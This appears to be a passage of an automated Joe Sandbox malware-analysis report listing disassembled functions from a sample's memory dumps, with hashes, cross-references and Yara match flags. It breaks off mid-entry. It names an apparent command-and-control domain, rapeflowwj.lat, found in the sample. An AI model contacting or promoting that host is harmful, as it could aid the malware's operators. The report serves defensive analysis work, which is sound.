Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 0098B547 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

_, xrefs: 0098B68F
+|-~, xrefs: 0098B56D
/pqr, xrefs: 0098B575

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction ID: 779a7afb232bfc783f4767d4543801ce52a75909cdd0cb68e3d81e54e2db399a
Opcode Fuzzy Hash: 6cec998220da979fd4d7e4802d464de526f10a737984141f1598214dad803a78
Instruction Fuzzy Hash: 57812B5260499006DB2CDF3888A373BBAD69FC4308B29D1BED955CFB67E938C502874D

Function 00985FD3 Relevance: 3.8, Strings: 3, Instructions: 37COMMON

Download Yara Rule

Strings

NDNK, xrefs: 00985FEC
X, xrefs: 00986039
WJeX, xrefs: 0098604C

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: NDNK$WJeX$X
API String ID: 0-3631875968
Opcode ID: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction ID: 07d7e06b9e0305cfa8b035b2de2601585269f6f4e28274368c27a5135c42a7f5
Opcode Fuzzy Hash: d11f5f5163d6808065bde529015e1f128c891bcdaf4957bf72f467d8a2f5d03f
Instruction Fuzzy Hash: 9001BC7051D7908FD3B1AF259859B9FBFE4ABD3310F214D2CC5DDAA212DA3688008B07

Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

rapeflowwj.lat, xrefs: 0040DF76, 0040E316
Dx, xrefs: 0040E139

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 0097DE40 Relevance: 3.0, Strings: 2, Instructions: 528COMMON

Download Yara Rule

Strings

rapeflowwj.lat, xrefs: 0097E1DD, 0097E57D
Dx, xrefs: 0097E3A0

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: Dx$rapeflowwj.lat
API String ID: 0-2060909294
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 4b3d79766b8325e08c3c76308e4a044ad797d06cf541c1d04e74b1fb0573a621
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: 3DF1DBB150D3D18ED335CF658480BEBBBE0AB96314F188AADC8D95B642C735090ACB93

Function 0099DCBC Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

0K), xrefs: 0099E180
4*VP, xrefs: 0099E18B

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction ID: c59ae584654f53d7a9040fbb527357d66b1741032ce7d9dbeb7382fa14babdec
Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
Instruction Fuzzy Hash: 06D1F53051D3D08EDB35CB3D84517ABBBE59FA7314F1889ADD4C98B282D7798806CB62

Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

4*VP, xrefs: 0042DF24
0K), xrefs: 0042DF19

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418680
P<?, xrefs: 00418590

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 009A8A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 009A8B5C

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: /,-
API String ID: 0-1700940157
Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction ID: abb9365875a109b9d849c19a7d5adef0a9a82b02d92458db2c39640d843dab86
Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
Instruction Fuzzy Hash: FAB168707083509BD7249F248881A7BB7A6EBD7724F18892CE4D9572D1DB31EC06CBD6

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 0099B3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0099B5D5

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: de479e0cbb9a4ba3b88fcb14ad7e297ddf2dff7880be365c2ef555d8c6424b04
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 77710B32A083554BDF14CE2DE68032EB7E6ABC5720F29C92DE4949B361D73DDC459B42

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 0098DAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

klm, xrefs: 0098DC13

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction ID: 6e6579832ea4cc670a351c879392f945a02cebb44cee3c19f00aeb53d5501d0e
Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
Instruction Fuzzy Hash: ED51D1B46093518BD714EF24C45276BB7F2FFA6308F18996CE4D68B390E7398901CB1A

Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 00998DC8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00998E87

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction ID: 1ebaa9374528498303d6ca093a0af0e8c34be70cb0659ed1c2a8df9f0ed552e8
Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
Instruction Fuzzy Hash: 994121B0D012198BCF10DF98DC917AFB7B1FF4A310F098259E446ABB94E7785942CB94

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 0097B973 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0097B9B2

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 06c637e1f864a34d55a3d922aef97da8a6c1a13359352e331fcb3c715c71f379
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 6811E570218380AFC310CF65CDC1B6EBFE29BC2304F65983DE19597251C675E949D705

Function 0041682D Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
Opcode Fuzzy Hash: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A

Function 004197C2 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786

Function 00989A29 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: cd382d7d654f72aee9b37bc957d36a206292111a33163d475abf3f103e8e654f
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: E8021371A083128BC724DF28C8916ABB7F1EFE5314F19892DE8C99B351E7389945C786

Function 004291DD Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94

Function 00999444 Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
Instruction ID: 789c24e3ea3d9b02ba90622ef5e1630a1e1af4510f8adb8b51ac8cf122db176b
Opcode Fuzzy Hash: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
Instruction Fuzzy Hash: 6EF135B1E002258BCF24CF5CC8516AAB7B6FF85314F19819DD896AF355EB349C42CB91

Function 00405990 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
Opcode Fuzzy Hash: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96

Function 00975BF7 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction ID: 7a1c2a483c38e67ce067801e134ca5bc0fbfb8f6116dcbd06259f08d15a0fc99
Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction Fuzzy Hash: 57F1CE36608B418FC724CF29C88176BFBE6AFD8300F48882CE5D987351E675E845CB92

Function 00415220 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A

Function 00988055 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
Instruction ID: 593d82d3fcf4c005be8272521466f111673aab26372daea9f174bd59b25739a2
Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
Instruction Fuzzy Hash: 27B1757A6087509BD3249B99C884ABFB7D7FB95310F9D993DC4C2A7311CB30AC0487A6

Function 00426B95 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
